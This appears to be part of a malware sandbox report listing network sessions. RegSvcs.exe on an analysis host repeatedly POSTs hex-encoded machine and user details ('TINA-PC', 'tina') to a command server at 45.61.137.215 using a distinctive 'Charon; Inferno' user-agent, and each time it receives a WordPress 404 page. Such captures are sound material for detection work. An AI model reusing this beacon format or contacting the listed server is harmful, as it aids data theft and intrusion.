May 29, 2024 15:43:09.282526970 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:09.290288925 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:11.778201103 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:09 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:11.778222084 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:43:11.778233051 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:43:11.778469086 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:43:11.778492928 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:43:11.778507948 CEST	1236	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:43:11.778528929 CEST	1236	IN	Data Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
May 29, 2024 15:43:11.778542042 CEST	1120	IN	Data Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
May 29, 2024 15:43:11.778553963 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:11.778568029 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	49738	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:11.942922115 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:11.948863029 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:14.553116083 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:12 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:14.553134918 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:14.553144932 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:14.553154945 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:14.553164959 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:14.553174019 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:14.553184032 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:14.553195953 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:43:14.553245068 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:14.553280115 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	49739	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:14.729917049 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:14.734863043 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:17.206835032 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:15 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:17.206871033 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:17.206886053 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:17.206928968 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:17.206971884 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:17.206985950 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:17.207014084 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:17.207027912 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:43:17.207062960 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
